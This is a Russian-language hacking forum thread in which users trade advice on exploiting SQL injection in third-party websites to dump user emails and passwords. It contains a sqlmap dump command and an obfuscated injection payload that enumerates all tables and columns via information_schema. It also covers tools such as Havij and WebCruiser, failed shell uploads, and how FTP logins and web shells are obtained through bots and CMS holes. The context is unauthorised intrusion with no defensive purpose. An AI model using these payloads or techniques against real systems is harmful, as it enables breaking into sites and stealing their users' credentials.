14.02.2014, 19:43
|
|
Познающий
Регистрация: 20.09.2012
Сообщений: 53
С нами:
7180886
Репутация:
0
|
|
OxoTnik
Код:
python sqlmap.py -u http://site.com/index.php?i=-1 --dump -D db_name -T table_name -C "column1,column2"
|
|
|
14.02.2014, 19:48
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Так зачем скульмап, если можно одним запросом вывести все таблици и колонки.
В принтабельное поле вставляешь.
(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(n ull)%66rom(%69nformation_schema.%63olumns)%77here( %74able_schema!=0x696e666f726d6174696f6e5f73636865 6d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,ta ble_schema,0x2e,table_name,0x3a,%63olumn_name))))x )
|
|
|
|
14.02.2014, 20:24
|
|
Познающий
Регистрация: 20.09.2012
Сообщений: 53
С нами:
7180886
Репутация:
0
|
|
Сообщение от erwap
Имеем скулю
Нужно сдампить mail,pass. Пробую через sqlmap - вот что выходит
http://clip2net.com/s/6P9XZ6
При чем, если дампить отдельно, или mail, или pass то все норм.
Через havij не вариант, он долго думает, особенно при сохранении больших дампов.
Как решить проблему? За ранее спасибо
Кажется разобрался, походу эта трабла возникла из-за неравного кол-ва колонок. Задал параметры start=1 и stop= чуть меньше, чем coun column
Главное что бы теперь ничего не перемешалось
А залиться не получается. Нет прав на запись
|
|
|
|
14.02.2014, 20:30
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
WebCruiser хорошо дампить, если он скулю раскрутит
|
|
|
|
14.02.2014, 22:40
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
подскажите софт чтоб залить бд себе на машину.. пробовал через havij, но это нереально долго.. какие есть предложения?
|
|
|
|
14.02.2014, 23:02
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Shade
подскажите софт чтоб залить
бд
себе на машину.. пробовал через
havij
, но это нереально долго.. какие есть предложения?
И снова здравствуйте. mysqldump, входящий в стандратную поставку mysql-клиента. Если речь о mysql, конечно.
|
|
|
|
15.02.2014, 00:43
|
|
Новичок
Регистрация: 12.02.2013
Сообщений: 21
С нами:
6972086
Репутация:
0
|
|
Добрый вечер
Подскажите пожалуйста как брутят и добывают шеллы или Ftp доступы?!
Сканил сайт webcruiserom скулю находит раскрутить не может..Помогите чайнику(
|
|
|
|
15.02.2014, 15:49
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами:
7396886
Репутация:
231
|
|
Сообщение от Shade
подскажите софт чтоб залить
бд
себе на машину.. пробовал через
havij
, но это нереально долго.. какие есть предложения?
sqlmap
https://github.com/sqlmapproject/sqlmap/wiki/Usage
-D dbname -T tablename -C columns --dump
|
|
|
|
15.02.2014, 16:47
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от CoolHucker
Добрый вечер
Подскажите пожалуйста как брутят и добывают шеллы или Ftp доступы?!
Сканил сайт webcruiserom скулю находит раскрутить не может..Помогите чайнику(
софт раскручивает самые обычные и самые стандартные скули... Если ручками раскручивать скули не умеешь, то и от софта будет не много толку. Возможно какие-то символы фильтруются.. например имя таблицы.. это исправляется зашифровкой имени таблицы в hex. А вообще так сказать сложно..выложи скулю.. тебе скажут в чем проблема
|
|
|
|
15.02.2014, 17:04
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от CoolHucker
Добрый вечер
Подскажите пожалуйста как брутят и добывают шеллы или Ftp доступы?!
Сканил сайт webcruiserom скулю находит раскрутить не может..Помогите чайнику(
Брутят, вы не поверите, брутом. Все тупо до безобразия. Фтп как правило тырят ботами с машин. Шеллы массово - через дыры в популярных цмс.
Сканер выкидывайте и учитесь работать руками. Когда сможете написать свой или с первого взгляда описать алгоритм любого такого сканера - тогда и будет толк от их использования.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
